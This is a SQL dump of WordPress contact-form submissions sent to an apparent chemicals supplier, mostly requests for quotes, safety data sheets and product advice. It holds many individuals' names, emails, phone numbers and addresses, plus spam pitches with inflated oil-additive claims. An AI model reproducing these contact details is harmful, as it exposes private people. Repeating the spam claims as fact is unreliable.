INSERT INTO `wp_postmeta` VALUES (27412, 3211, '_seq_num', '171'); 
INSERT INTO `wp_postmeta` VALUES (27413, 3211, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27414, 3211, '_field_12', 'JoAnn Holtz'); 
INSERT INTO `wp_postmeta` VALUES (27415, 3211, '_field_13', 'Norgren GT Developement Corp'); 
INSERT INTO `wp_postmeta` VALUES (27416, 3211, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27417, 3211, '_field_14', 'JoAnn.Holtz@imi-precision.com'); 
INSERT INTO `wp_postmeta` VALUES (27418, 3211, '_field_15', '(720) 283-5801'); 
INSERT INTO `wp_postmeta` VALUES (27419, 3211, '_field_16', 'Can you please provide the USHTS , ECCN and origin for Krytoxgpl 107- Thank you '); 
INSERT INTO `wp_postmeta` VALUES (27420, 3211, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27421, 3211, '_sub_id', '3211'); 
INSERT INTO `wp_postmeta` VALUES (27422, 3212, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27423, 3212, '_seq_num', '144'); 
INSERT INTO `wp_postmeta` VALUES (27424, 3212, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27425, 3212, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27426, 3212, '_field_1', 'Bijan Gharai'); 
INSERT INTO `wp_postmeta` VALUES (27427, 3212, '_field_10', 'B&amp;m Silver Inc'); 
INSERT INTO `wp_postmeta` VALUES (27428, 3212, '_field_2', 'bmsilverinc@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (27429, 3212, '_field_8', '(818) 428-9286'); 
INSERT INTO `wp_postmeta` VALUES (27430, 3212, '_field_3', 'Greeting\r\nI want to introduce you a  product car oil additive named BORON VIGOR  oil additive, which claims to improve fuel consumption by more than ten to fifteen  per cent and reduce engine wear, has launched in the UK.\r\nThe product is already available in continental Europe  and has recently gone through trials by the Motor Industry Research Association. \r\n\r\nBORON VIGOR  is non-toxic and non-acidic and is based upon a physical process, not involving any chemical reaction with engine oil as it is chemically inert. \r\nIt contains two active ingredients: boron diamond powder (MCDP) and nano\r\nboron and works by building up boron metal films in the engine’s inner\r\nparts, which are designed to prevent direct contact between frictional\r\nsurfaces, helping to cool them down and seal them.\r\nIt claims to last for up to 20,000 miles, compared to liquid lubricants which last up to 1,000 miles.\r\n\r\nWhat if you could achieve a 15 per cent improvement in fuel economy and CO2 emissions by simply pouring a bottle of liquid into your truck or car&#039;s engine? It sounds like fantasy but it is a reality, with the launch in the UK of a revolutionary new engine oil additive that&#039;s simple to use, validated by experts and called BORON VIGOR®.\r\n\r\nBOROON VIGOR®is a totally unique engine lubricant that can benefit every driver. It\r\nhas been developed using the chemical element Boron and the hi-tech\r\nscience of nano-technology. Put simply,  reduces engine\r\nfriction to very a low level, leading to more efficient operation. That\r\nmeans improved fuel economy and lower CO2 emissions.\r\n\r\nThe benefits of using BORON VIGOR® are impressive. \r\n\r\nOn environment: Less CO2 emissions\r\nLower demand on fossil fuels\r\nNon-toxic, non acidic, chemically inert  \r\nOn your pocket: Lower fuel consumption by up to 15%\r\nExtended engine lifespan by up to 100%\r\nImproved engine oil quality \r\n\r\nOn performance: Improved engine power by up to 9%\r\nLower oil temperature by up to 30%\r\nReduced corrosion and friction \r\nLess engine wear \r\n The Independent testing,  carried out by the respected TÜV NORD Technical Inspection.\r\nI kindly ask you to distribute our product in U.s. Market and if you need more information and/or want to contact the producer , please let me know.\r\nThanks and have a great day\r\nRegards:\r\nBijan Gharai\r\n20116 Pienza Ln Porter Ranch CA 91326\r\nbijangharai@hotmail.com\r\n818-428-9286\r\n'); 
INSERT INTO `wp_postmeta` VALUES (27431, 3212, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27432, 3212, '_sub_id', '3212'); 
INSERT INTO `wp_postmeta` VALUES (27433, 3213, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27434, 3213, '_seq_num', '145'); 
INSERT INTO `wp_postmeta` VALUES (27435, 3213, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27436, 3213, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27437, 3213, '_field_1', 'Dr. Kevin Marsico'); 
INSERT INTO `wp_postmeta` VALUES (27438, 3213, '_field_10', 'Shock Tech Inc.'); 
INSERT INTO `wp_postmeta` VALUES (27439, 3213, '_field_2', 'inspector.km@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (27440, 3213, '_field_8', '(845) 422-0278'); 
INSERT INTO `wp_postmeta` VALUES (27441, 3213, '_field_3', 'Greetings,\r\nShock-Tech is currently considering a new project for one of our valued customers &amp; Production is seeking an a cleaner that QC will accept &amp; approve for the sake of a protocol &amp; establishing a procedure for future manufacture &amp; S.O.Ps.  \r\nSo I immediately thought of your MS-260 which proved on past projects to be very effective.  Therefore, I&#039;d like to obtain a sample spray can of your MS-260 &amp; perhaps small sample of your pre-packaged wipes I can give to the Production Manager to see if he would rather utilize those or both?\r\nPlease send to: \r\nDr. Kevin Marsico\r\n166 East Railroad Ave.\r\nW. Overstate, N.Y. 10993\r\n\r\nThank you for your time, &amp; courtesy concerning this matter. \r\nSincerely,\r\nDr. Kevin Marsico'); 
INSERT INTO `wp_postmeta` VALUES (27442, 3213, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27443, 3213, '_sub_id', '3213'); 
INSERT INTO `wp_postmeta` VALUES (27444, 3214, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27445, 3214, '_seq_num', '146'); 
INSERT INTO `wp_postmeta` VALUES (27446, 3214, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27447, 3214, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27448, 3214, '_field_1', 'Obaid Bajri'); 
INSERT INTO `wp_postmeta` VALUES (27449, 3214, '_field_10', 'ALBAJRI TRADING EST'); 
INSERT INTO `wp_postmeta` VALUES (27450, 3214, '_field_2', 'aboodi@albajri.biz'); 
INSERT INTO `wp_postmeta` VALUES (27451, 3214, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (27452, 3214, '_field_3', 'Dear Sir,\r\nWe will be grateful if you could quote the following…….\r\n\r\n\r\nCLEANER,CONTACT,HYDROCARBON MIXTU,12 TO\r\nCLEANER,INDUSTRIAL:\r\nCLEANER TYPE:\r\nCONTACT;\r\nCLEANING AGENT NAME:\r\nHYDROCARBON MIXTU;\r\nCONTAINER:\r\n12 TO 16 OZ AEROSOL CAN;\r\nADDITIONAL DATA:\r\nITEM ADDITIONAL DESCRIPTION:  LIQUID, N\r\nON-CONDUCTIVE; 0.7 TO 0.8 SPECIFIC GRAV\r\nITY MUST NOT ATTACK PLASTIC, RUBBER OR\r\nMETAL; WILL NOT STAIN OR LEAVE ANY RESI\r\nDUE ON CONTACTS;  SYSTEM PARENT EQUIPME\r\nNT INFORMATION:  FOR ELECTRONIC CIRCUIT\r\nS, PCB&#039;S, PRECISION RELAYS AND CONTACTO\r\nRS ETC; SHOULD REMOVE CONTAMINANTS, OIL\r\n, FINGER PRINTS, TAR, CARBON AND DIRT D\r\nEPOSITS FROM CONTACTS AND PLACES WHERE\r\nAPPROACH IS DIFFICULT.  SUPERSOLVE AS\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#MS-230/CO2\r\nCRC CHEMICALS EUROPE S.A.:\r\nP/N#02016\r\nCRC CHEMICALS EUROPE S.A.:\r\nMS-230/CO2\r\nCRC CHEMICALS EUROPE S.A.:\r\nMS-230\r\nCRC CHEMICALS EUROPE S.A.:\r\nCONTACT CLEANER'); 
INSERT INTO `wp_postmeta` VALUES (27453, 3214, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27454, 3214, '_sub_id', '3214'); 
INSERT INTO `wp_postmeta` VALUES (27459, 3218, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27460, 3218, '_seq_num', '147'); 
INSERT INTO `wp_postmeta` VALUES (27461, 3218, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27462, 3218, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27463, 3218, '_field_1', 'Gabriela Mironescu'); 
INSERT INTO `wp_postmeta` VALUES (27464, 3218, '_field_10', 'MED TECHNOLOGY'); 
INSERT INTO `wp_postmeta` VALUES (27465, 3218, '_field_2', 'gabriela.mironescu@medtechnology.it'); 
INSERT INTO `wp_postmeta` VALUES (27466, 3218, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (27467, 3218, '_field_3', 'Dear Sirs,\nMy name is Gabriela Mironescu and I’m in charge with MED TECHNOLOGY procurement department \nOur Company is located in Rome, Italy and we deal as distributors for the aerospace field; for more about us please visit our website www.medtechnology.it \nWe are looking for the following product\n\nPAINT MIL-I-46058 TY.UR*INSULATING POLYURETHANE RESIN (EMAP*LOCKHEED) PACKAGING 1 GAL\nQ-ty: 2 pcs\nQuality requirements:\n-	Mfg certificate of conformance stating production batch nr, DOM and DOE\n\nLooking forward to receiving your quotation\nYours sincerely,\nGabriela Mironescu\n'); 
INSERT INTO `wp_postmeta` VALUES (27468, 3218, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27469, 3218, '_sub_id', '3218'); 
INSERT INTO `wp_postmeta` VALUES (27470, 3219, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27471, 3219, '_seq_num', '172'); 
INSERT INTO `wp_postmeta` VALUES (27472, 3219, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27473, 3219, '_field_12', 'Richard Bitter'); 
INSERT INTO `wp_postmeta` VALUES (27474, 3219, '_field_13', 'Highway Materials'); 
INSERT INTO `wp_postmeta` VALUES (27475, 3219, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27476, 3219, '_field_14', 'richard.bitter@depaulgroup.com'); 
INSERT INTO `wp_postmeta` VALUES (27477, 3219, '_field_15', '(610) 834-0100'); 
INSERT INTO `wp_postmeta` VALUES (27478, 3219, '_field_16', 'I would like the sds for the following product;   Orange Citrus Release agent'); 
INSERT INTO `wp_postmeta` VALUES (27479, 3219, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27480, 3219, '_sub_id', '3219'); 
INSERT INTO `wp_postmeta` VALUES (27481, 3220, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27482, 3220, '_seq_num', '173'); 
INSERT INTO `wp_postmeta` VALUES (27483, 3220, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27484, 3220, '_field_12', 'Martin Agbasonu'); 
INSERT INTO `wp_postmeta` VALUES (27485, 3220, '_field_13', 'HALLIBURTON'); 
INSERT INTO `wp_postmeta` VALUES (27486, 3220, '_field_18', '224 '); 
INSERT INTO `wp_postmeta` VALUES (27487, 3220, '_field_14', 'udochukwu.agbasonu@halliburton.com'); 
INSERT INTO `wp_postmeta` VALUES (27488, 3220, '_field_15', '(832) 367-5197'); 
INSERT INTO `wp_postmeta` VALUES (27489, 3220, '_field_16', 'I would like to view sds'); 
INSERT INTO `wp_postmeta` VALUES (27490, 3220, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27491, 3220, '_sub_id', '3220'); 
INSERT INTO `wp_postmeta` VALUES (27492, 3221, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27493, 3221, '_seq_num', '174'); 
INSERT INTO `wp_postmeta` VALUES (27494, 3221, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27495, 3221, '_field_12', 'Richard Gruskos'); 
INSERT INTO `wp_postmeta` VALUES (27496, 3221, '_field_13', 'Kessler Ellis Products'); 
INSERT INTO `wp_postmeta` VALUES (27497, 3221, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27498, 3221, '_field_14', 'richard@kep.com'); 
INSERT INTO `wp_postmeta` VALUES (27499, 3221, '_field_15', '(732) 935-1320'); 
INSERT INTO `wp_postmeta` VALUES (27500, 3221, '_field_16', 'We offer conformal coating of our printed circuit boards using your MS470 Urethane Conformal Coating and achieve good results.\n\nOne of our customers is asking for specific wording to reflect the enhanced humidity resistance made possible by application of conformal coating.\n\nHe is asking for 85% RH Non-Condensing.\n\nWhat wording for relative humidity/temperature do you recommend?\n\n'); 
INSERT INTO `wp_postmeta` VALUES (27501, 3221, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27502, 3221, '_sub_id', '3221'); 
INSERT INTO `wp_postmeta` VALUES (27503, 3222, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27504, 3222, '_seq_num', '148'); 
INSERT INTO `wp_postmeta` VALUES (27505, 3222, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27506, 3222, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27507, 3222, '_field_1', 'Gary  Dalton'); 
INSERT INTO `wp_postmeta` VALUES (27508, 3222, '_field_10', 'FilterMag International'); 
INSERT INTO `wp_postmeta` VALUES (27509, 3222, '_field_2', 'gdalton@filtermag.com'); 
INSERT INTO `wp_postmeta` VALUES (27510, 3222, '_field_8', '(435) 640-9920'); 
INSERT INTO `wp_postmeta` VALUES (27511, 3222, '_field_3', 'FilterMag Contamination Control Products compliment your product offerings.  We keep oil cleaner longer, extend equipment life and mitigate ongoing maintenace costs due to contamination.  www.filtermag.com.  I am looking for a distributor to market our world class products and hope to discuss this with you at your convenicence.  \r\nRespectfully,\r\nGary Dalton'); 
INSERT INTO `wp_postmeta` VALUES (27512, 3222, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27513, 3222, '_sub_id', '3222'); 
INSERT INTO `wp_postmeta` VALUES (27514, 3223, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27515, 3223, '_seq_num', '175'); 
INSERT INTO `wp_postmeta` VALUES (27516, 3223, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27517, 3223, '_field_12', 'Marie Ensley'); 
INSERT INTO `wp_postmeta` VALUES (27518, 3223, '_field_13', 'Siemens'); 
INSERT INTO `wp_postmeta` VALUES (27519, 3223, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27520, 3223, '_field_14', 'marie.ensley@siemens.com'); 
INSERT INTO `wp_postmeta` VALUES (27521, 3223, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (27522, 3223, '_field_16', 'Need some clarification on part numbers for PTFE chemicals.   In our system, a mold release agent was created  around Feb 2007 with a MS part number of  DPMS-C0831B.   We currently use MS-143H which I understand is EOL changing to MS-143TE.   Is the C0831B just a previous version of the MS-143H?  Also, what is the shelf life of the MS-143TE?\r\n Thank you\r\n    Marie Ensley'); 
INSERT INTO `wp_postmeta` VALUES (27523, 3223, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27524, 3223, '_sub_id', '3223'); 
INSERT INTO `wp_postmeta` VALUES (27525, 3224, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27526, 3224, '_seq_num', '149'); 
INSERT INTO `wp_postmeta` VALUES (27527, 3224, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27528, 3224, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27529, 3224, '_field_1', 'Mithun reddy'); 
INSERT INTO `wp_postmeta` VALUES (27530, 3224, '_field_10', 'Ems technology '); 
INSERT INTO `wp_postmeta` VALUES (27531, 3224, '_field_2', 'Smidhunreddy@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (27532, 3224, '_field_8', '(603) 858-6979'); 
INSERT INTO `wp_postmeta` VALUES (27533, 3224, '_field_3', 'I am interested on conform coating.i have  one year experience in PCB conform coating in India.present I am student in usa at new England college,henniker.but I am internship program.'); 
INSERT INTO `wp_postmeta` VALUES (27534, 3224, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27535, 3224, '_sub_id', '3224'); 
INSERT INTO `wp_postmeta` VALUES (27536, 3225, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27537, 3225, '_seq_num', '176'); 
INSERT INTO `wp_postmeta` VALUES (27538, 3225, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27539, 3225, '_field_12', 'Brenda Solar'); 
INSERT INTO `wp_postmeta` VALUES (27540, 3225, '_field_13', 'Mrs.'); 
INSERT INTO `wp_postmeta` VALUES (27541, 3225, '_field_18', 'brendaso'); 
INSERT INTO `wp_postmeta` VALUES (27542, 3225, '_field_14', 'brendaso@marvin.com'); 
INSERT INTO `wp_postmeta` VALUES (27543, 3225, '_field_15', '(218) 386-1430'); 
INSERT INTO `wp_postmeta` VALUES (27544, 3225, '_field_16', 'My phone extension is 1931 .  I am writing to request your updated version of the SDS for MS-122AD PTFE Release Agent   Dry lubricant.  We  only have the MSDS and we are required now to have an SDS.  An electronic copy via email would be appreciated.\r\n\r\nThank you for your time and attention.  \r\nBrenda Solar\r\nMarvin Windows &amp; Doors\r\nResearch &amp; Development \r\nLab Technician\r\n401 States Ave., PO Box 100\r\nWarroad, MN 56763\r\nPhone 218-386-1431  Ext. 1931\r\nE-mail brendaso@marvin.com\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (27545, 3225, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27546, 3225, '_sub_id', '3225'); 
INSERT INTO `wp_postmeta` VALUES (27547, 3226, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27548, 3226, '_seq_num', '150'); 
INSERT INTO `wp_postmeta` VALUES (27549, 3226, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27550, 3226, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27551, 3226, '_field_1', 'Barbara Frame'); 
INSERT INTO `wp_postmeta` VALUES (27552, 3226, '_field_10', 'Oak Ridge National Laboratory'); 
INSERT INTO `wp_postmeta` VALUES (27553, 3226, '_field_2', 'framebj@ornl.gov'); 
INSERT INTO `wp_postmeta` VALUES (27554, 3226, '_field_8', '(865) 576-1892'); 
INSERT INTO `wp_postmeta` VALUES (27555, 3226, '_field_3', 'Please provide name and contact information for local supplier/distributor of  DER 332 epoxy resin. We are located in Tennessee by Knoxville.'); 
INSERT INTO `wp_postmeta` VALUES (27556, 3226, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27557, 3226, '_sub_id', '3226'); 
INSERT INTO `wp_postmeta` VALUES (27558, 3227, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27559, 3227, '_seq_num', '151'); 
INSERT INTO `wp_postmeta` VALUES (27560, 3227, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27561, 3227, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27562, 3227, '_field_1', 'Douglas Lenz'); 
INSERT INTO `wp_postmeta` VALUES (27563, 3227, '_field_10', 'SABIC'); 
INSERT INTO `wp_postmeta` VALUES (27564, 3227, '_field_2', 'douglas.lenz@sabic.com'); 
INSERT INTO `wp_postmeta` VALUES (27565, 3227, '_field_8', '(518) 475-5070'); 
INSERT INTO `wp_postmeta` VALUES (27566, 3227, '_field_3', 'Do you sell magnesium stearate spray mold release?'); 
INSERT INTO `wp_postmeta` VALUES (27567, 3227, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27568, 3227, '_sub_id', '3227'); 
INSERT INTO `wp_postmeta` VALUES (27569, 3229, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27570, 3229, '_seq_num', '152'); 
INSERT INTO `wp_postmeta` VALUES (27571, 3229, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27572, 3229, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27573, 3229, '_field_1', 'Peggy Allie'); 
INSERT INTO `wp_postmeta` VALUES (27574, 3229, '_field_10', 'Visibility Boost'); 
INSERT INTO `wp_postmeta` VALUES (27575, 3229, '_field_2', 'peggyallie.visibilityboost@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (27576, 3229, '_field_8', '877-228-1545'); 
INSERT INTO `wp_postmeta` VALUES (27577, 3229, '_field_3', 'Hi,  \r\n \r\nFrom what I can tell, you are doing a lot of great marketing, but around 98 per cent of leads to your website are leaving without taking any action on your site. I can show you how, through reverse IP lookup, we can identify the companies and individuals visiting your site. I can also provide you with the contact info - including names, emails and phone numbers - of these visitors, effectively doubling or tripling the number of leads that can be harvested from your existing web traffic.\r\n \r\nMy team has over twelve years of experience driving results for our clients, and we want you to be a part of their long reputation for success. We&#039;re based in Los Angeles, we&#039;re Google partners, and we&#039;ve received accolades from Inc Magazine and the LA Business Journal. \r\n \r\nIs there a time this week that works best to set up a call?\r\n\r\nBest,\r\n\r\nPeggy Allie\r\nDigital Marketing Manager\r\n(877) 228-1545\r\nVisibility Boost'); 
INSERT INTO `wp_postmeta` VALUES (27578, 3229, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27579, 3229, '_sub_id', '3229'); 
INSERT INTO `wp_postmeta` VALUES (27580, 3230, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27581, 3230, '_seq_num', '153'); 
INSERT INTO `wp_postmeta` VALUES (27582, 3230, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27583, 3230, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27584, 3230, '_field_1', 'Rick Collin'); 
INSERT INTO `wp_postmeta` VALUES (27585, 3230, '_field_10', 'Cortez Sanitation District-Cortez, CO'); 
INSERT INTO `wp_postmeta` VALUES (27586, 3230, '_field_2', 'rick.collin@cortezsanitation.com'); 
INSERT INTO `wp_postmeta` VALUES (27587, 3230, '_field_8', '(970) 565-3962'); 
INSERT INTO `wp_postmeta` VALUES (27588, 3230, '_field_3', 'We are a waste water treatment plant and we are needing a release agent to apply to roll off dumpsters in order to get the waste sludge out of these dumpsters. \nThe final waste product (sludge) is put into 16 cu. yd. roll off dumpsters and then taken to the landfill. now we are only getting 2/3 release dumped out.  The sludge is heavy 17% moisture, so there is compaction and the sludge also contains polymer which gives it adhesion (sticky). Please advise of any product you may have. Thank you'); 
INSERT INTO `wp_postmeta` VALUES (27589, 3230, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27590, 3230, '_sub_id', '3230'); 
INSERT INTO `wp_postmeta` VALUES (27591, 3231, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27592, 3231, '_seq_num', '177'); 
INSERT INTO `wp_postmeta` VALUES (27593, 3231, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27594, 3231, '_field_12', 'Ibrahim ewais'); 
INSERT INTO `wp_postmeta` VALUES (27595, 3231, '_field_13', 'Nationalheaters'); 
INSERT INTO `wp_postmeta` VALUES (27596, 3231, '_field_18', '1000'); 
INSERT INTO `wp_postmeta` VALUES (27597, 3231, '_field_14', 'Barhoom_2006@hotmail.com'); 
INSERT INTO `wp_postmeta` VALUES (27598, 3231, '_field_15', '(962) 420-2550'); 
INSERT INTO `wp_postmeta` VALUES (27599, 3231, '_field_16', 'Dear supplier \r\n\r\nWe are the nationalheaters company mainly producing catradge heaters with one end terminal , we would like to advice us of which material can be possible used in the upper part of the heater to end sealing the terminals and the inner parts in the heater noted that we need a material high speed dry and bad  electrical  connection with high temp resistance , for more details contact us \r\n\r\n\r\nRegards \r\nWww.nationalheaters.com'); 
INSERT INTO `wp_postmeta` VALUES (27600, 3231, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27601, 3231, '_sub_id', '3231'); 
INSERT INTO `wp_postmeta` VALUES (27602, 3232, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27603, 3232, '_seq_num', '154'); 
INSERT INTO `wp_postmeta` VALUES (27604, 3232, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27605, 3232, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27606, 3232, '_field_1', 'Michelle Horning'); 
INSERT INTO `wp_postmeta` VALUES (27607, 3232, '_field_10', 'The United Oil Company'); 
INSERT INTO `wp_postmeta` VALUES (27608, 3232, '_field_2', 'michelle@duralene.com'); 
INSERT INTO `wp_postmeta` VALUES (27609, 3232, '_field_8', '(410) 342-1200'); 
INSERT INTO `wp_postmeta` VALUES (27610, 3232, '_field_3', 're:  price increase letter\nplease quote Krytox GPL 225\nthank you'); 
INSERT INTO `wp_postmeta` VALUES (27611, 3232, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27612, 3232, '_sub_id', '3232'); 
INSERT INTO `wp_postmeta` VALUES (27613, 3233, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27614, 3233, '_seq_num', '155'); 
INSERT INTO `wp_postmeta` VALUES (27615, 3233, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27616, 3233, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27617, 3233, '_field_1', 'Wilfred Sorensen'); 
INSERT INTO `wp_postmeta` VALUES (27618, 3233, '_field_10', 'BubbleAction Pumps Ltd.'); 
INSERT INTO `wp_postmeta` VALUES (27619, 3233, '_field_2', 'bubbleactionpumps@cogeco.ca'); 
INSERT INTO `wp_postmeta` VALUES (27620, 3233, '_field_8', '(613) 542-4045'); 
INSERT INTO `wp_postmeta` VALUES (27621, 3233, '_field_3', 'Along with the beauty of a wood burning fireplace one has to accept the chore of scraping off the black soot that condenses on the glass door. I believe there is a market for a high temperature grease that is colorless or nearly so for applying to the the glass before starting a fire. This should make it easier to wipe off the soot.\r\nHave you a high teperature grease that is clear or nearly so? '); 
INSERT INTO `wp_postmeta` VALUES (27622, 3233, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27623, 3233, '_sub_id', '3233'); 
INSERT INTO `wp_postmeta` VALUES (27624, 3234, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27625, 3234, '_seq_num', '178'); 
INSERT INTO `wp_postmeta` VALUES (27626, 3234, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27627, 3234, '_field_12', 'dave hogberg'); 
INSERT INTO `wp_postmeta` VALUES (27628, 3234, '_field_13', 'Abelconn'); 
INSERT INTO `wp_postmeta` VALUES (27629, 3234, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27630, 3234, '_field_14', 'dhogberg@abelconn.com'); 
INSERT INTO `wp_postmeta` VALUES (27631, 3234, '_field_15', '(763) 536-3666'); 
INSERT INTO `wp_postmeta` VALUES (27632, 3234, '_field_16', 'need quote for smallest quantity of epon 828 and versamid 125 curing agent. Who manufactures the versamid 125? Are they the only manufacturer? Was the versamid originally a Henkel product?'); 
INSERT INTO `wp_postmeta` VALUES (27633, 3234, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27634, 3234, '_sub_id', '3234'); 
INSERT INTO `wp_postmeta` VALUES (27635, 3235, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27636, 3235, '_seq_num', '156'); 
INSERT INTO `wp_postmeta` VALUES (27637, 3235, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27638, 3235, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27639, 3235, '_field_1', 'Iyke Igboanugo'); 
INSERT INTO `wp_postmeta` VALUES (27640, 3235, '_field_10', 'Nexus Alliance Limited'); 
INSERT INTO `wp_postmeta` VALUES (27641, 3235, '_field_2', 'iyke@nexusallianceltd.com'); 
INSERT INTO `wp_postmeta` VALUES (27642, 3235, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (27643, 3235, '_field_3', '+234 808 132 1587\r\nWe have an urgent need for the provision of this product - MAGNA 114 (10pcs) and we have been committed to a timely provision of a quote. Provide pricing assurance with a duration and also confirm your capability to supply the goods in the required quantity.\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (27644, 3235, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27645, 3235, '_sub_id', '3235'); 
INSERT INTO `wp_postmeta` VALUES (27646, 3236, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27647, 3236, '_seq_num', '157'); 
INSERT INTO `wp_postmeta` VALUES (27648, 3236, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27649, 3236, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27650, 3236, '_field_1', 'Michael Zaccaria'); 
INSERT INTO `wp_postmeta` VALUES (27651, 3236, '_field_10', 'Continental Aromatics'); 
INSERT INTO `wp_postmeta` VALUES (27652, 3236, '_field_2', 'mzac619@aol.com'); 
